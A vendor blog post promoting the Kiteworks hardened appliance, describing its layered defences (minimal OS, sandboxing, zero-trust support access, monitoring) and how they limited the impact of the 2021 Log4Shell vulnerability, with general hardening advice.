Beating Log4Shell: How the Kiteworks Hardened Appliance Lived Up to Its Name
If you ask a random security professional or CISO if they remember what they did on December 9, 2021, there’s a very good chance that the answer will be yes. That is the day organizations around the world scrambled to urgently upgrade and update almost every piece of critical system and infrastructure they had due to the publication of the Log4Shell vulnerability; the critical vulnerability in the popular Log4j library that allows anyone with an internet connection to remotely execute arbitrary commands on the operating systems of vulnerable products.
Kiteworks did not require an urgent patch on that day, even though it does indeed utilize Log4j. Due to Kiteworks multi-layered security approach in building its hardened appliance, the vulnerability CVSS score of 10.0 was automatically reduced to a 4.0 (at most) in Kiteworks. This provided Kiteworks customers with the knowledge and assurance that their most critical and sensitive information was safe and protected.
Protection From the Inside Out
To paraphrase English poet John Donne, “no system is an island entire of itself,” and Kiteworks is no different. By its own nature, Kiteworks is a connected system, allowing its users to collaborate with colleagues (both internal and external) in a safe, secure, and compliant manner. This means that Kiteworks must connect to other systems, and allow other systems and users to connect to it. The challenge is to be able to do it in a full zero-trust manner, ensuring that nothing and no one comes in or out without authorization, and without being noticed.
To that end, we created the Kiteworks hardened appliance.
Minimalist Operating System
A Kiteworks hardened appliance begins its life as a bare installation of the Linux operating system, with only the absolute minimum number of libraries and system applications required for its operation. The Kiteworks’ DevOps team then installs a highly curated set of third-party libraries, each of them absolutely required for the operation of Kiteworks and approved by the security team.
The list of utilized libraries is continuously scanned against a database of known vulnerabilities, ensuring the Kiteworks hardened appliance is always up to date with the required security patches and upgrades.
At the end of the day, a Kiteworks hardened appliance has zero unnecessary active ports or services.
Operating System Hardening
Operating system hardening is the practice of securing an operating system by reducing its vulnerabilities, mitigating threats, and minimizing its attack surface. The goal of hardening an operating system is to make it more secure, reliable, and resilient to cyberattacks. Here are some common practices for operating system hardening:
How Does System Hardening Reduce the Attack Surface?
System hardening is the process of securing a computer system by reducing its attack surface, which refers to the total area that a hacker can exploit to gain unauthorized access or steal sensitive information. There are several ways that system hardening reduces the attack surface, including:
- Disabling unnecessary services and protocols: By disabling unnecessary services and protocols, you reduce the number of entry points that a hacker can exploit to gain unauthorized access. Each service or protocol that is running on a system can potentially introduce vulnerabilities, so removing any that are not required for business operations can reduce the attack surface.
- Updating software and firmware: Keeping software and firmware up to date helps to patch known vulnerabilities or weaknesses that could be exploited by attackers. This reduces the likelihood of attackers being able to exploit known vulnerabilities in outdated software.
- Configuring access controls: Properly configuring access controls can limit the number of users who have access to sensitive data, reducing the attack surface by limiting the number of potential targets for attackers.
- Implementing strong authentication: Strong authentication mechanisms, such as multi-factor authentication, can make it more difficult for attackers to gain unauthorized access, further reducing the attack surface.
- Enforcing password policies: By implementing strong password policies, such as requiring complex passwords and regular password changes, you can reduce the likelihood of attackers gaining access through brute-force attacks.
- Removing unnecessary user accounts: By removing user accounts that are no longer needed, you reduce the number of potential targets for attackers to gain unauthorized access.
System hardening is an important part of any organization’s cybersecurity strategy. By reducing the attack surface, you can make it more difficult for attackers to gain access to sensitive data or systems, protecting your organization from potential threats.
Device Hardening vs. Hardened Security Appliances
Device hardening refers to the process of securing individual devices by removing or disabling unnecessary services, applying security patches, and implementing security controls like firewalls, encryption, and access controls. Hardened security appliances, on the other hand, are specialized devices that are designed and optimized to perform specific security tasks, such as firewalling, intrusion detection and prevention, and content filtering.
These devices come with built-in security features and are preconfigured to provide maximum protection against a range of threats. In short, while device hardening involves securing individual devices, hardened security appliances provide an additional layer of protection by providing specialized security functionalities within a network environment.
Zero Trust (Goes Both Ways)
Continuing the notion of minimal access, the Kiteworks hardened appliance internals can only be accessed by exactly one system account. A very small number of other system accounts exist, but their permission set is extremely limited in light of the “Principle of Least Privilege,” and they are not allowed interactive access to the appliance.
In order to ensure the integrity of the Kiteworks hardened appliance, the support account can only be used by a certified Kiteworks support engineer. No customer is ever given the password to that account, not even for an appliance installed in their on-premises data center.
However, Kiteworks also ensures that this connection can only be achieved with the explicit and active approval of the customer. During normal operations, only the customer administrator can access an account; Kiteworks does not know or have access to the account password. When a support session is required, a system administrator can generate a new encrypted access password on the fly and pass it to the support engineer. They, in turn, have the ability to decrypt it and use it to connect.
The outcome is full, double-sided zero trust.
Internal Monitoring
All Kiteworks hardened appliances are equipped with internal mechanisms to monitor and enforce highly strict policies regarding the expected behavior of both the operating and file systems. If, for any reason, a Kiteworks hardened appliance deviates from its original state (e.g., a file is unexpectedly changed or created where it wasn’t supposed to, or a service started listening to an unexpected port), an alert is automatically sent to the administrator.
The hardened appliance also maintains detailed logs for all critical services activity, allowing system administrators to monitor the Kiteworks internal workings in real time using their own security information and event management (SIEM) and other security orchestration, automation, and response (SOAR) tools.
Internal Sandboxing
As mentioned before, the operation of Kiteworks relies, at times, on libraries provided by a third party—either open source or commercial. To the least possible extent, Kiteworks utilizes these libraries inside an operating system-level sandbox. In other words, although the third-party library in question is installed, its access to other parts of the operating system or file systems is significantly limited. This ensures that, even if a vulnerability is found in one of these libraries, the potential threat to the Kiteworks hardened appliance is significantly reduced.
Network Policy Enforcement
To ensure that the operating system original state is enforced on the network side as well, all Kiteworks hardened appliances have a very strict internal firewall configuration, allowing incoming network traffic only through the required and expected channels and ports.
Additional Network Protections
All Kiteworks hardened appliances are equipped with mechanisms to monitor and block malicious connections and web requests. On top of the static firewall configuration that blocks network connections on unexpected ports, we also utilize dynamic blocking of malicious requests. In addition, repeat offenders are automatically and completely blocked, to ensure the smooth and safe operation of the appliance and the Kiteworks solution.
Network Appliance for Network Security
A network appliance for network security is a hardware device that is designed to protect a computer network from unauthorized access, viruses, malware, and other threats. It is essentially a specialized computer that is optimized for security purposes and is placed on the network to monitor all traffic flowing through it.
Typically, a network security appliance will include a number of security features, such as firewalls, intrusion detection/prevention systems, antivirus/malware software, virtual private network (VPN) support, and content filtering. These features work together to identify and block malicious traffic, prevent attacks, and keep the network secure.
Network security appliances are used by businesses and organizations of all sizes, from small startups to large enterprises. They are particularly important for companies that handle sensitive or confidential data, such as financial institutions, medical facilities, and government agencies. By using a network security appliance, organizations can ensure that their network is protected and their data remains secure.
Network Hardening Best Practices
To ensure maximum protection, network administrators should adopt best practices such as implementing strong passwords, installing firewalls, using encryption protocols, regularly updating software, monitoring network traffic, and conducting regular security audits. It is also important to restrict access to sensitive data based on need-to-know principles and regularly train employees on cybersecurity awareness. By following these best practices, businesses can ensure their network remains secure and protected from potential threats.
Enter Log4j
Log4j is an event logging library, which is provided as a free-to-use, open-source solution by the Apache foundation. The foundation itself is backed by many of the major brands in the world, including Google, Microsoft, Amazon, and Apple, among others. Due to its well-trusted provider, its many strengths, and its simple usage, Log4j quickly became one of the most popular libraries in the world, incorporated by most major vendors into various solutions. Kiteworks is one of those vendors.
In December of 2021, it was discovered that Log4j had a serious security vulnerability. After investigation, the National Vulnerability Database (NVD), operated by the National Institute of Standards and Technology (NIST), gave the vulnerability the highest possible CVSS score—a 10.0.
This scoring system takes into consideration many factors, revolving around how easy it is to exploit and the extent of potential damage. The Log4j vulnerability, nicknamed Log4Shell, practically allowed any unauthenticated person in the world to make any vulnerable system in the world execute malicious code.
With the extreme popularity of Log4j, it is easy to see why this became a global incident overnight.
Kiteworks Hardened Appliance to the Rescue
While many vendors around the world struggled to issue emergency patches and alert their customers about the urgent need to install them, Kiteworks did not.
After a thorough investigation, the Kiteworks security team concluded that, in the context of the hardened appliance, the vulnerability’s CVSS score would be a 4 at the most. In fact, to this day, no proof exists that there is a way to exploit the vulnerability in Kiteworks. The following are some of the key takeaways:
- Following the Principle of Least Privilege, the vulnerable library was implemented and utilized in a highly restrictive configuration. This meant that the vulnerable APIs were disabled, and therefore not exploitable.
- The vulnerable library ran inside its own sandbox, meaning that it was impossible for it to run any external code, let alone malicious one. Therefore, even if it were to be exploited, the potential threat was significantly reduced.
- The vulnerable library was highly monitored, meaning that any deviation from its expected behavior would have been noticed and alerted on. It never had.
Even with the above in the foreground, we did not want to take any chances. The following release of Kiteworks incorporated a patch and multiple mechanisms to prevent any possibility of exploitation, even if the risk was minimal to nonexistent.
These included:
- An upgraded, non-vulnerable version of the vulnerable library.
- Amended the library configuration to specifically disable the vulnerable setting. Even if the vulnerable APIs would be enabled in the future, security will still be intact.
- A special rule in our internal network protection mechanisms, blocking any direct Log4j web requests.
Find Out More About the Kiteworks Hardened Appliance
Kiteworks customers facilitate internal and external collaboration and trust us with their most sensitive and critical content. To live up to that responsibility, the Kiteworks hardened appliance is meticulously engineered with layers on layers of security mechanisms, allowing it to withstand not only known attacks but also previously completely unknown attacks.
To learn more about the Kiteworks hardened appliance, schedule a custom-tailored demo of the Kiteworks Private Content Network today.
Additional Resources
- Brief Kiteworks Hardened Virtual Appliance Provides Multiple Security Layers to Dramatically Reduce Vulnerability Exploit and Impact Severity
- Blog Post “Log4Shell” Apache Vulnerability: What Kiteworks Customers Need To Know
- Fact Sheet Log4Shell Zero-day Vulnerability
- Report 2023 Forecast for Managing Private Communications Exposure Risk
- Brief Top 6 Reasons to Add Email Protection Gateway (EPG) to Your Kiteworks Deployment